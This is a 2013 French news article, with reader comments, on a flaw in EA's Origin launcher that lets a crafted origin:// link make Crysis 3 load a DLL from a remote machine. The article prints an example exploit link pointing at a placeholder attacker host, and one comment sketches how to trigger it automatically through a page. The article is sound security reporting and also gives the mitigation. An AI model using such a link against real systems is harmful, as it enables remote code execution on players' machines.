Connexion

Catégories

Droit Économie Flock Hardware IA Internet Logiciel Sciences Sécurité Société

Nous Suivre

Contact rédaction Contact site Forum
Flux RSS GitHub Discord

À propos

Abonnez-vous

Attaquer un PC ou un Mac, c’est simple comme un lien Origin

Une brêche qui touchait déjà Steam

Attaquer un PC ou un Mac, c'est simple comme un lien Origin

Le 19 mars 2013 à 09h23

Electronic Arts est décidément sous le feu des projecteurs ces derniers temps, et pas pour de bonnes raisons. Après les soucis de SimCity, c'est au tour de la plateforme Origin de poser des problèmes à l'éditeur, puisqu'une faille très facilement exploitable rend vulnérable n'importe quelle machine à une attaque extérieure.

 

Electronic Arts revendique un peu plus de 40 millions d'usagers sur sa plateforme Origin, et tous peuvent désormais être la victime d'attaques malveillantes. Nos confrères d'Ars Technica ont relevé durant la conférence Black Hat, s'étant déroulée du 12 au 15 mars à Amsterdam qu'une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC.

 

Donato Ferrante et Luigi Auriemma, deux chercheurs travaillant pour ReVuln, et auteurs de cette découverte, expliquent que la faille découverte ne demande que quelques secondes pour être exploitée. Dans certains cas, aucune interaction avec la victime n'est requise. Notez qu'il n'est pas nécéssaire qu'Origin soit actif pour que la brêche fonctionne, sa seule installation sur le système est suffisante.

Une démonstration qui semble très simple

La démonstration faite par les deux hommes est assez simple, il suffit de trouver un moyen de permettre d'activer l'exécution de code à distance sur la machine cible. Dans le cas d'un joueur de Crysis 3, les chercheurs utilisent le NVidia Benchmark framework intégré dans le moteur CryEngine. Il suffit ensuite de créer un lien Origin afin que la plateforme récupère au prochain lancement du jeu le fichier que l'on souhaite introduire dans la machine cible. Le lien prend la forme suivante :

 

origin://LaunchGame/71503?CommandParams= -openautomate \\IP_ATTAQUANT\evil.dll

 

On reconnait tout d'abord le lien original utilisé par la plateforme pour lancer le jeu : « origin://LaunchGame/71503 » mais affublé d'un paramètre lui demandant de récupérer le fichier evil.dll sur l'ordinateur de l'attaquant. Le jeu démarre normalement, et l'utilisateur ne remarque rien de particulier, pourtant sa machine est désormais infectée.

La faille rappelle une de celles découvertes dans Steam

Cependant, il faut noter que la plateforme d'EA n'est pas la seule à être touchée par ce genre de vulnérabilité. En effet, un cas similaire avait touché Steam au mois d'octobre. Si l'intégrité du client de la plateforme n'était pas atteinte, certains pirates faisaient précéder leurs URLs par « Steam:// » pour berner les navigateurs, clients emails ou toutes sortes d'applications afin qu'elles exécutent du code malveillant. 

 

La parade était assez simple puisqu'il suffisait de désactiver le lancement automatique des URL débutant par Steam://. Le même genre de solution est proposée par les chercheurs aux utilisateurs d'Origin, qui leur suggèrent de paramétrer leur navigateur afin qu'il demande une confirmation avant d'exécuter un tel lien. Nous vous laissons maintenant découvrir la faille en images.

 

Commentaires (58)

Vous devez être abonné pour pouvoir commenter.

Abonnez-vous
votre avatar

Crysis n’est pas un jeu mais un logiciel de benchmark. <img data-src=" />

votre avatar







Konrad a écrit :



<img data-src=" />



Faut-il rappeler que “PC” ne désigne que le hardware, et qu’il est possible d’y installer Windows, GNU/Linux, UNIX…



Ce serait appréciable de ne pas trop entretenir l’égalité “PC = Windows” <img data-src=" />







Et un Mac est un PC qui plus est…


votre avatar

Vive le Cloud<img data-src=" />

votre avatar







Gericoz a écrit :



Je comprend pas trop la fonctionnement de cette faille, il faut ouvrir un lien qui fait télécharger un fichier qui se copie sur la machine pour l’infecter?

Maintenant je ne vois pas comment arriver à le mettre en place sur une machine ciblée.

Il faut donc cliquer sur un lien dans un navigateur qui va donc au final lancer un jeu? Il faut aussi que le jeu du lien soit installé sur la machine?







Un lien origin:// permet de lancer directement un programme dans Origin. Le lien n’a pas besoin d’être forcement clique par l’utilisateur si il est redirige dessus. La plupart des navigateurs demandent par contre une confirmation à l’utilisateur avant de lancer Origin (voir le paper sur Steam pour plus d’informations sur la réaction des navigateurs). En sachant aussi que le lien peut éventuellement être ouvert par autre chose qu’un navigateur (client mail, IM, etc).



Une fois que l’utilisateur à cliquer sur le lien, il suffit de trouver une faille dans un des jeux. En l’occurrence, ils utilisent une faille dans le NVidia Benchmark framework, inclus dans le CryEngine. La faille permet de lancer ce benchmark en chargeant une dll depuis n’importe quelle emplacement (y compris distant). Ensuite, c’est l’imagination du pirate qui prend le pas…



Pour ce qui est de cibler le jeu, plusieurs jeux peuvent être inclus dans la même url (Crysis 1/2/3 pour cibler le CryEngine par exemple).



Et en ce qui concerne les autres jeux, rien n’indique qu’ils ne sont pas vulnérables. Ils avaient trouve plusieurs vulnérabilités en exemple dans certains jeux Steam : le Source Engine, l’Unreal Engine, APB Reloaded et MicroVolts.


votre avatar







Ideal a écrit :



Origin ainsi que des jeux EA sont dispo sur GNU/Linux Unix ? si oui je trouve que t’es un peu parano .. sinon je trouve que t’es vraiment trop parano <img data-src=" />



et bon tout de même j’imagine que les gens achetant des jeux EA tout en supportant l’installation d’un programme insipide comme Origin ne doivent pas être légion sous OS alternatif…Il faut bien se mettre d’accord windows est en position largement dominante sur les PCs de gamers et pour cause …

Donc pour 98% des cas PC de gamers = Windows ou égale PC tournant sous Mac OS <img data-src=" />





Je ne faisais que rappeler un point technique : en cas de faille comme ici, ce n’est pas le “PC” (dans le sens hardware) qui a une faille ni qui se fait infecter, mais bel et bien l’OS (Windows en l’occurence). Il ne s’agit pas de parano.



Quand il y a une faille sur Android, on parle bien du système et non pas des machines (on ne dit pas “ les smartphones Samsung ont une faille”, ni “les téléphones HPC sont infectés”). Quand il y a des failles dans le noyau Linux (oui il y en a parfois) on parle bien de Linux, on ne dit pas “les PC”.



Tout ce que je dis, c’est qu’en toute rigueur il faudrait toujours faire la distinction entre la machine (PC, smartphone…) et le système qui est installé dessus.


votre avatar







Yutani a écrit :



tu peux confirmer une chose ? la durée de vie du jeu est aussi réduite, 4-5 heures en prenant son temps ? <img data-src=" />







Oui et la marmotte…..



Perso je l’ai fait sur 360, en prenant mon temps j’ai mis plus de 20h (en hard).

Sur certains tests ils disent que le jeu se termine en 2h30, c’est de la désinformation car pour pour le terminer dans ce laps de temps il faut passer toutes les vidéos, et courir depuis l’entrée de chaque niveau directement à la sortie, sans s’occuper des objectifs secondaires ni des ennemis, ou alors en y allant à la bourrin sur les quelques ennemis qui pourraient gèner ce rush vers la sortie (il est effectivement possible de jouer comme celà en difficulté normale tant les armes sont puissantes et l’armure efficace), mais est-ce que jouer comme ça peut s’appeler “faire un jeu” ???



Après si tu y va à la bourrin c’est clair que tu mettras pas 20h, moi j’essayais de buter chaque ennemis sans me faire repérer, ça oblige à observer quelques minutes leurs déplacements pour voir comment les éliminer 1 par 1 sans se faire repérer, faut se déplacer en mode camouflage pour aller des uns aux autres, tout ça prends du temps.

Donc ça dépend de la manière de jouer, si tu as envie de le terminer en 4h tu vas y arriver, mais tu n’auras rien vu du jeu, un peu comme si sur un fifa tu joues 2 matchs dans la saison et tu simules tous les autres… et dire après c’est naze on peut faire une saison en 1h <img data-src=" />



Ceci dit le jeu n’est pas excellent pour autant, les ennemis sont relativement idiots par exemple, mais je tenais à apporter mon point de vue sur la durée de vie du jeu, car la mode depuis quelques années c’est de jouer comme une âne en facile pour terminer un jeu complet sans mourrir une seule fois, et ce le plus rapidement possible, si ton trip c’est de jouer comme ça faut surtout pas que tu fasses ce jeu, si tu aimes prendre ton temps, fouiller les niveaux à la recherche des items cachés et jouer sans te faire repérer par les ennemis, la durée de vie ça sera plus de 15h, pour le reste des défauts et des qualités du jeu tu peux te fier aux différents tests là je suis plutôt d’accord avec eux.


votre avatar



Ceci dit le jeu n’est pas excellent pour autant, les ennemis sont relativement idiots par exemple, mais je tenais à apporter mon point de vue sur la durée de vie du jeu





Invisibilité permanente + Arc, jeu torché

<img data-src=" />

votre avatar







Spouny a écrit :



Oui et la marmotte…..



Perso je l’ai fait sur 360, en prenant mon temps j’ai mis plus de 20h (en hard).

Sur certains tests ils disent que le jeu se termine en 2h30, c’est de la désinformation car pour pour le terminer dans ce laps de temps il faut passer toutes les vidéos, et courir depuis l’entrée de chaque niveau directement à la sortie, sans s’occuper des objectifs secondaires ni des ennemis, ou alors en y allant à la bourrin sur les quelques ennemis qui pourraient gèner ce rush vers la sortie (il est effectivement possible de jouer comme celà en difficulté normale tant les armes sont puissantes et l’armure efficace), mais est-ce que jouer comme ça peut s’appeler “faire un jeu” ???



Après si tu y va à la bourrin c’est clair que tu mettras pas 20h, moi j’essayais de buter chaque ennemis sans me faire repérer, ça oblige à observer quelques minutes leurs déplacements pour voir comment les éliminer 1 par 1 sans se faire repérer, faut se déplacer en mode camouflage pour aller des uns aux autres, tout ça prends du temps.

Donc ça dépend de la manière de jouer, si tu as envie de le terminer en 4h tu vas y arriver, mais tu n’auras rien vu du jeu, un peu comme si sur un fifa tu joues 2 matchs dans la saison et tu simules tous les autres… et dire après c’est naze on peut faire une saison en 1h <img data-src=" />



Ceci dit le jeu n’est pas excellent pour autant, les ennemis sont relativement idiots par exemple, mais je tenais à apporter mon point de vue sur la durée de vie du jeu, car la mode depuis quelques années c’est de jouer comme une âne en facile pour terminer un jeu complet sans mourrir une seule fois, et ce le plus rapidement possible, si ton trip c’est de jouer comme ça faut surtout pas que tu fasses ce jeu, si tu aimes prendre ton temps, fouiller les niveaux à la recherche des items cachés et jouer sans te faire repérer par les ennemis, la durée de vie ça sera plus de 15h, pour le reste des défauts et des qualités du jeu tu peux te fier aux différents tests là je suis plutôt d’accord avec eux.





c’est toujours utile d’avoir d’autres avis, merci pour le tien <img data-src=" />


votre avatar

N’étant pas du tout un spécialiste je n’ai pas bien compris l’affaire… mais, comme ça, à vue de nez, effectivement, c’est grave.

Ma question : sur PS3, un pirate peut-il utiliser cette faille ?

votre avatar







Spouny a écrit :



Oui et la marmotte…..



Perso je l’ai fait sur 360, en prenant mon temps j’ai mis plus de 20h (en hard).

tu fasses ce jeu, si tu aimes prendre ton temps, fouiller les niveaux à la recherche .







Lol .. j’ai mis le mod ultra hard le niveau max “sur humain” chose dans le genre ,j’ai pas mis plus de 7h et quasiment toujours furtif .. fufu arc, cible tir accroupi defufu fufu cible tir , voilà ce que je fais j’ai essayé mod bourrin mais en 2-3 coups sur certains “mobs” tu meurs.. ah aussi AUCUN mais absolument aucun ( si celle des bots sauce CS1.6) IA !

à moins qu’ils aient raboté pour la version PC , 20h faut vouloir faire tout les succès et c’est pas vraiment mon truc c’est artificiel pourtant j’ai pris tout les “docus”



edit ; Deus Ex HR m’a pris 25 h en faisant que la moitié des badges steam sauf 1 quête que j’ai raté :‘( et ça j’ai vraiment senti qu’il y avait du jeu donc bon

Mais Crysis 3 est quand même joli ça c’est sûr après, l’arc trop puissant et les amélio de la combi peut être un peu cheat


votre avatar

il pourrait etre INterressant que PCI donne la marche a suivre ou un lien vers un article expliquant comment desactiver / limiter l’interpretation des url origin://



<img data-src=" />

votre avatar







oeildemoscou a écrit :



Ma question : sur PS3, un pirate peut-il utiliser cette faille ?





JE ne pense pas car Origins est une application un peu comme Steam, ca te permet d’acceder à une boutique en ligne de jeux (BF3,…)



Sur PS3 il n’y a pas besoin d’installer Origin !


votre avatar

de toutes les facons vous pouvez tous presumer que vos ordinateurs/tablettes/smartphones soient des bots qui font des choses sans que vous le sachiez (gaffe au webcam et micro). RE-de toutes les facons il faut des competences que peu ont, et c’est relou a detecter meme pour ceux qui les capacites.

votre avatar







Konrad a écrit :



…ce n’est pas le “PC” (dans le sens hardware) qui a une faille ni qui se fait infecter, mais bel et bien l’OS (Windows en l’occurence).







Absolument pas ! <img data-src=" />



Il ne s’agit pas d’une faille de l’OS puisque c’est bien l’utilisateur qui a installé cette bouse d’Origin, certainement avec une élévation du compte utilisateur en administrateur.



C’est donc bien, comme dans la majorité des cas, une action de l’utilisateur qui va faire confiance à telle ou telle source de programme et ouvrir son système sans le savoir à un programme malveillant.



Tu peux être dans n’importe quel système avec n’importe quel OS et les meilleurs antivirus du monde…

La pire des failles, c’est souvent l’utilisateur. <img data-src=" />



Même dans cet exemple il faut cumuler trois énormes erreurs :




  • Installer Origin… <img data-src=" />

  • Cliquer sur un lien dont l’origine est suspect.

  • Et en plus ! Sur la plupart des navigateurs, confirmer sa connerie.



    Faut vraiment en tenir une couche, quoi… <img data-src=" />


votre avatar

Réponse d’un porte-parole d’EA : “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”

Source

votre avatar







Inny a écrit :



Réponse d’un porte-parole d’EA : “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”

Source





je trouve néanmoins un peu idiot que leur “constant investigating” ne se soit pas penché sur une faille découverte il y a 5-6 mois sur une procédure semblable à la leur…


votre avatar







AxelDG a écrit :



Absolument pas ! <img data-src=" />



Il ne s’agit pas d’une faille de l’OS puisque c’est bien l’utilisateur qui a installé cette bouse d’Origin, certainement avec une élévation du compte utilisateur en administrateur.



C’est donc bien, comme dans la majorité des cas, une action de l’utilisateur qui va faire confiance à telle ou telle source de programme et ouvrir son système sans le savoir à un programme malveillant.



Tu peux être dans n’importe quel système avec n’importe quel OS et les meilleurs antivirus du monde…

La pire des failles, c’est souvent l’utilisateur. <img data-src=" />



Même dans cet exemple il faut cumuler trois énormes erreurs :




  • Installer Origin… <img data-src=" />

  • Cliquer sur un lien dont l’origine est suspect.

  • Et en plus ! Sur la plupart des navigateurs, confirmer sa connerie.



    Faut vraiment en tenir une couche, quoi… <img data-src=" />





    Je vois pas le problème, je trouve pas qu’Origin soit une bouse si contraignante que ça. Au contraire c’est bien pratique pour jouer à certains jeux. Le seul truc chiant c’est la multiplication des plateformes à installer (mais c’est aussi bon pour la concurrence).



    Ensuite pour le clic sur le lien ça peut très bien être fait sur quelqu’un qui ne fait pas trop attention dans un forum pour une demande d’aide par exemple. Pas besoin d’en tenir une couche. Essaye de redescendre un peu.


votre avatar







Inny a écrit :



Réponse d’un porte-parole d’EA : “Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure.”

Source







Oui, la citation est tirée de la source de l’article. Mais comme cette déclaration c’est juste du vent, on ne l’a pas soulignée. S’Ils avaient dit qu’un correctif arriverait dans les prochains jours on l’aurait relevé ;)


votre avatar







RaYz a écrit :



Je vois pas le problème, je trouve pas qu’Origin soit une bouse si contraignante que ça. Au contraire c’est bien pratique pour jouer à certains jeux. Le seul truc chiant c’est la multiplication des plateformes à installer (mais c’est aussi bon pour la concurrence).





C’est exactement ce que je reproche à ce genre de plateforme : la redondance avec Steam qui assumait parfaitement ce rôle, le peu de valeur ajoutée au produit et bien sûr les déconnexions intempestives (même si peu gênantes, elles existent bien).







RaYz a écrit :



Ensuite pour le clic sur le lien ça peut très bien être fait sur quelqu’un qui ne fait pas trop attention dans un forum pour une demande d’aide par exemple. Pas besoin d’en tenir une couche. Essaye de redescendre un peu.





Un lien Origin dans un forum d’aide… mais bien sûr… j’essaie de redescendre mais j’y arrive pas là…


votre avatar







AxelDG a écrit :



C’est exactement ce que je reproche à ce genre de plateforme : la redondance avec Steam qui assumait parfaitement ce rôle, le peu de valeur ajoutée au produit et bien sûr les déconnexions intempestives (même si peu gênantes, elles existent bien).





Un lien Origin dans un forum d’aide… mais bien sûr… j’essaie de redescendre mais j’y arrive pas là…





Ouai c’est totalement irréaliste



Est-ce que ça fonctionne?



Ça peut aussi être un lien dans un mail.


votre avatar







Khalev a écrit :



Ouai c’est totalement irréaliste







Ce qui est irréaliste ce n’est pas de créer le lien… c’est surtout d’être inconscient au point de cliquer dessus sans lire l’url de destination. <img data-src=" />



Ca devrait faire parti des habitudes de n’importe quel internaute.


votre avatar







AxelDG a écrit :



Ce qui est irréaliste ce n’est pas de créer le lien… c’est surtout d’être inconscient au point de cliquer dessus sans lire l’url de destination. <img data-src=" />



Ca devrait faire parti des habitudes de n’importe quel internaute.





Mais oui bien sur tous les internautes de cette planète doivent déchiffrer le lien avant d’y cliquer dessus. Et si je mets un redirect avec bit.ly ils font comment, une autre procédure à mettre en place pour les centaines de liens qu’on clique par jour ?

Faut que t’arrêtes de raconter n’importe quoi et réfléchir 2mn mon garçon.


votre avatar







AxelDG a écrit :



Ce qui est irréaliste ce n’est pas de créer le lien… c’est surtout d’être inconscient au point de cliquer dessus sans lire l’url de destination. <img data-src=" />



Ca devrait faire parti des habitudes de n’importe quel internaute.





Tu sais que tu peux faire un lien avec une url de destination qui n’est pas la vraie?



Regarde Google.


votre avatar







RaYz a écrit :



Mais oui bien sur tous les internautes de cette planète doivent déchiffrer le lien avant d’y cliquer dessus. Et si je mets un redirect avec bit.ly ils font comment, une autre procédure à mettre en place pour les centaines de liens qu’on clique par jour ?

Faut que t’arrêtes de raconter n’importe quoi et réfléchir 2mn mon garçon.









Khalev a écrit :



Tu sais que tu peux faire un lien avec une url de destination qui n’est pas la vraie?



Regarde Google.







J’admets que je pousse un peu au delà de ce qu’on peut attendre d’un utilisateur moyen mais votre mauvaise fois m’incite à clore ce débat stérile.

<img data-src=" />


votre avatar







AxelDG a écrit :



J’admets que je pousse un peu au delà de ce qu’on peut attendre d’un utilisateur moyen mais votre mauvaise fois m’incite à clore ce débat stérile.

<img data-src=" />





<img data-src=" /> <img data-src=" />


votre avatar







AxelDG a écrit :



J’admets que je pousse un peu au delà de ce qu’on peut attendre d’un utilisateur moyen mais votre mauvaise fois m’incite à clore ce débat stérile.

<img data-src=" />





http://www.w3schools.com/jsref/event_onload.asp

http://www.w3schools.com/jsref/met_win_open.asp



“T’auras un message d’avertissement, mais t’inquiète pas c’est normal.”

Vu l’âge de certains qui jouent à BF3 & co ça passera comme dans du beurre.


votre avatar

J’ai eu une màj d’origin à midi, est-ce lié au problème ?

<img data-src=" />

votre avatar







Khalev a écrit :



“T’auras un message d’avertissement, mais t’inquiète pas c’est normal.”

Vu l’âge de certains qui jouent à BF3 & co ça passera comme dans du beurre.





Si c’est aussi bien écrit, non, ça passera pas. <img data-src=" />


votre avatar







Inny a écrit :



Si c’est aussi bien écrit, non, ça passera pas. <img data-src=" />





<img data-src=" />



“Tkt tora 1 fenetr clik Ok c normal.”


votre avatar







RaYz a écrit :



<img data-src=" /> <img data-src=" />







Oulalah c’est trop drôle ! <img data-src=" />







Khalev a écrit :



http://www.w3schools.com/jsref/event_onload.asp

http://www.w3schools.com/jsref/met_win_open.asp



“T’auras un message d’avertissement, mais t’inquiète pas c’est normal.”

Vu l’âge de certains qui jouent à BF3 & co ça passera comme dans du beurre.







Si j’avais à configurer un PC pour un gosse, je lui donnerai pas les droits d’admin… point barre.

On parle juste des bases de sécurité…

Maintenant moi je m’en cogne tant que j’ai pas à me taper la réinstallation de machines complétement verolées parce que je serais un couillon qui clique n’importe où, hein… <img data-src=" />


votre avatar







Konrad a écrit :



Je ne faisais que rappeler un point technique : en cas de faille comme ici, ce n’est pas le “PC” (dans le sens hardware) qui a une faille ni qui se fait infecter, mais bel et bien l’OS (Windows en l’occurence). Il ne s’agit pas de parano.



Quand il y a une faille sur Android, on parle bien du système et non pas des machines (on ne dit pas “ les smartphones Samsung ont une faille”, ni “les téléphones HPC sont infectés”). Quand il y a des failles dans le noyau Linux (oui il y en a parfois) on parle bien de Linux, on ne dit pas “les PC”.



Tout ce que je dis, c’est qu’en toute rigueur il faudrait toujours faire la distinction entre la machine (PC, smartphone…) et le système qui est installé dessus.







j’ai jamais dis le contraire mais au final ça tout le monde le sait donc pourquoi faire un commentaire inutile… comme on dit le mieux est l’ennemi du bien bah la c’est pareil à vouloir allez trop dans les détails on en oublie le principal … Origin c’est de la merde

Quand je te parle de paranoïa ne pense pas que PCINpact fait partie d’un complot qui a pour but de … oh et puis zut si t’as pas déjà compris ça sert à rien que je m’acharne :)


votre avatar



une équipe originaire de Malte est parvenue à utiliser Origin pour attaquer des Macs et des PC



Faux. Mon PC sous Linux ne craint rien.

votre avatar

J’ai comblé la faille, j’ai pas acheté Crysis 3 <img data-src=" />

votre avatar







Gericoz a écrit :



J’ai comblé la faille, j’ai pas acheté Crysis 3 <img data-src=" />





J’aurai dû faire pareil <img data-src=" />



M’enfin le jeu est tellement moisi que je l’ai vite désinstallé, et origin avec …


votre avatar







Gericoz a écrit :



J’ai comblé la faille, j’ai pas acheté Crysis 3 <img data-src=" />







Ouais ben moi il était offert avec ma CG, enfin bon je l’ai fini donc je peux virer le jeu et le launcher ce que je ferais en rentrant chez moi…


votre avatar

J’ai comblé la faille j’ai viré Origin, qui ne me servait plus de toutes façons. :)


votre avatar







Gericoz a écrit :



J’ai comblé la faille, j’ai pas acheté Crysis 3 <img data-src=" />







Crysis 3 est juste un exemple, mais théoriquement la faille peut être utilisée avec n’importe quel jeu.


votre avatar







Mamamia a écrit :



J’aurai dû faire pareil <img data-src=" />



M’enfin le jeu est tellement moisi que je l’ai vite désinstallé, et origin avec …





tu peux confirmer une chose ? la durée de vie du jeu est aussi réduite, 4-5 heures en prenant son temps ? <img data-src=" />


votre avatar







Yutani a écrit :



tu peux confirmer une chose ? la durée de vie du jeu est aussi réduite, 4-5 heures en prenant son temps ? <img data-src=" />





Oui, mais si au moins ces 45 heures valaient le coup <img data-src=" />



L’arc est ridiculement surpuissant, les ennemies ridiculement débiles.



Bref, passez votre chemin.


votre avatar







Gericoz a écrit :



J’ai comblé la faille, j’ai pas acheté Crysis 3 <img data-src=" />





J’ai jamais eu de faille, j’ai jamais installé Origin (et j’installerais probablement jamais).



Ceci dit, ça fait un petit moment que je traine Steam, et ça va pas s’arranger avec Linux qui monte en puissance <img data-src=" />


votre avatar







Ellierys a écrit :



Crysis 3 est juste un exemple, mais théoriquement la faille peut être utilisée avec n’importe quel jeu.





J’allais le préciser.


votre avatar

Suffit de ne lancer aucun jeu Origin donc. Oh wait.

votre avatar

Je comprend pas trop la fonctionnement de cette faille, il faut ouvrir un lien qui fait télécharger un fichier qui se copie sur la machine pour l’infecter?

Maintenant je ne vois pas comment arriver à le mettre en place sur une machine ciblée.

Il faut donc cliquer sur un lien dans un navigateur qui va donc au final lancer un jeu? Il faut aussi que le jeu du lien soit installé sur la machine?

votre avatar



Attaquer Windows ou un Mac, c’est simple comme un lien Origin



<img data-src=" />



Faut-il rappeler que “PC” ne désigne que le hardware, et qu’il est possible d’y installer Windows, GNU/Linux, UNIX…



Ce serait appréciable de ne pas trop entretenir l’égalité “PC = Windows” <img data-src=" />

votre avatar

oulala je vais le désinstaller, en plus il est pas à jour du tout…

votre avatar







Konrad a écrit :



<img data-src=" />



Faut-il rappeler que “PC” ne désigne que le hardware, et qu’il est possible d’y installer Windows, GNU/Linux, UNIX…



Ce serait appréciable de ne pas trop entretenir l’égalité “PC = Windows” <img data-src=" />







Origin ainsi que des jeux EA sont dispo sur GNU/Linux Unix ? si oui je trouve que t’es un peu parano .. sinon je trouve que t’es vraiment trop parano <img data-src=" />



et bon tout de même j’imagine que les gens achetant des jeux EA tout en supportant l’installation d’un programme insipide comme Origin ne doivent pas être légion sous OS alternatif…Il faut bien se mettre d’accord windows est en position largement dominante sur les PCs de gamers et pour cause …

Donc pour 98% des cas PC de gamers = Windows ou égale PC tournant sous Mac OS <img data-src=" />


votre avatar

J’ai pas Origin ce qui simplifie les choses pour moi ^^

votre avatar

J’ai acheter ME3 (pour basculer dans la légalité<img data-src=" />) depuis env 1 mois….à quoi sert origin* ?







* mis à part le besoin et l’absolu necessité pour EA de tout savoir tout sur moi et, accessoirement, de me foutre une laisse au cul en se foutant de ma gueulle…

votre avatar







Ricard a écrit :



Faux. Mon PC sous Linux ne craint rien.







Avec Origin installé dessus ? <img data-src=" />


votre avatar

La portion de code dans l’article est illisible sur version mobile (gris clair sur blanc)

votre avatar







Ellierys a écrit :



Avec Origin installé dessus ? <img data-src=" />





Ha… OK… Tu voulais donc dire Windows au lieu de PC….<img data-src=" />


votre avatar







Ricard a écrit :



Ha… OK… Tu voulais donc dire Windows au lieu de PC….<img data-src=" />







C’est ça, un PC avec Windows, comme 97 % des PC de joueurs. Ça me semble suffisant pour généraliser n’en déplaise aux 3 % restants.


votre avatar







Konrad a écrit :



Je ne faisais que rappeler un point technique : en cas de faille comme ici, ce n’est pas le “PC” (dans le sens hardware) qui a une faille ni qui se fait infecter, mais bel et bien l’OS (Windows en l’occurence). Il ne s’agit pas de parano.





(mode vilaine édition)



Y a pas eu des failles sur l’archi x86 en elle même à une époque ?



(/mode vilaine édition)


votre avatar







Baldurien a écrit :



(mode vilaine édition)



Y a pas eu des failles sur l’archi x86 en elle même à une époque ?



(/mode vilaine édition)







Faites rire les gens du libre…

Le jour où votre OS captera suffisamment de candidats, tout comme IOS est en train de le faire, vous vous ferez bouffer le cul par les hackers comme tout le monde.



Le Hacking c’est pas une question d’OS, c’est surtout une question de public… <img data-src=" />


votre avatar







Spouny a écrit :



Perso je l’ai fait sur 360, en prenant mon temps j’ai mis plus de 20h (en hard).

.









Il y a quelques années 20h c’était déjà juste ce qu’il fallait pour prendre un jeu en main <img data-src=" />



A force de tout niveler vers le bas … dans 2 ou 3 ans on lira sans doute que 5 heures c’est déjà pas si mal.


votre avatar

c’est aussi simple que d’attaquer le Ma<img data-src=" />li

votre avatar







AxelDG a écrit :



Faites rire les gens du libre…

Le jour où votre OS captera suffisamment de candidats, tout comme IOS est en train de le faire, vous vous ferez bouffer le cul par les hackers comme tout le monde.



Le Hacking c’est pas une question d’OS, c’est surtout une question de public… <img data-src=" />





Oh, et si on va par là, autant que je trolle grassement : le genre où il y aura plus de GTK, QT, que sais je et que sais je pour faire des clients graphiques, mais un seul truc (genre GDI+ sous Windows, etc) cohérent, afin d’avoir un système homogène, alors là y aura une vraie révolution.


votre avatar







Ellierys a écrit :



C’est ça, un PC avec Windows, comme 97 % des PC de joueurs. Ça me semble suffisant pour généraliser n’en déplaise aux 3 % restants.





<img data-src=" /> pour l’excuse.<img data-src=" />


Attaquer un PC ou un Mac, c’est simple comme un lien Origin

  • Une démonstration qui semble très simple

Fermer